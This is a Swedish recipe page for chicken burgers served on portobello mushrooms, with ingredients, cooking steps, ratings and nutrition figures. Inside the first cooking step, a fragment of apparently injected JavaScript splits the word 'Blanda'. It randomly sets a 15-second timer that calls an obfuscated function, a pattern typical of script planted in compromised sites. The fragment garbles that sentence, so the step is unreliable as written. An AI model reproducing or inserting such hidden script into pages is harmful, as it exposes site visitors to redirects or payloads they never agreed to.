Kycklingburgare

2013-07-08
burgare1burgare
  • Yield : 4
  • Servings : 4
  • Prep Time : 10m
  • Cook Time : 30m
  • Ready In : 40m

Ett nyttigt alternativ till den traditionella hamburgaren!

Ingredienser

  • 500 gram Kycklingfärs
  • 50 gram Soltorkade tomater
  • 75 gram Fetaost
  • 8 stora Portobellosvampar
  • 250 gram Lättkvarg
  • 1 Avokado
  • Ruccola
  • 1 Vitlöksklyfta
  • Kryddor efter smak

Gör så här:

Dela de soltorkade tomaterna och fetaosten i mindre bitar. Blandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a dessa med kycklingfärsen och smaksätt med pressad vitlök och kryddor efter smak (t.ex. Salt, peppar & timjan/ basilika).

Forma färsen till 4 stycken burgare och stek på medelhög värme tills de är genomstekta och har fått en fin yta. Stek portobellosvampen på båda sidor tills den blir lätt genomstekt. Lägg sedan på hushållspapper för att bli av med överflödig vätska.

Sätt ihop burgaren och varva med kvarg, avokado samt ruccola.

Medlemsbetyg

(4 / 5)

4 5 4
Betygsätt recept

4 people rated this recipe

Related Recipes:
  • Nutellapannkakor

    Nutellapannkakor

  • _SAM0920

    Svartvitlöks rostad kyckling

  • Vitchoklad & hallonpudding

    Vitchoklad & hallonpudding

  • SAM_0426

    Lax stekt i svartvitlök, rotfrukts, spenatsallad med kapris och persiljekräm.

  • _SAM0388

    Entrecote med smörstekta rotfrukter i timjan & rostad potatis

Näringssinnehåll

Informationen gäller per portion

  • Kalorier

    414 kcal
  • Protein

    44 g
  • Kolhydrater

    16 g
  • Fett

    19 g

Recipe Comments

Post A Comment

Current ye@r *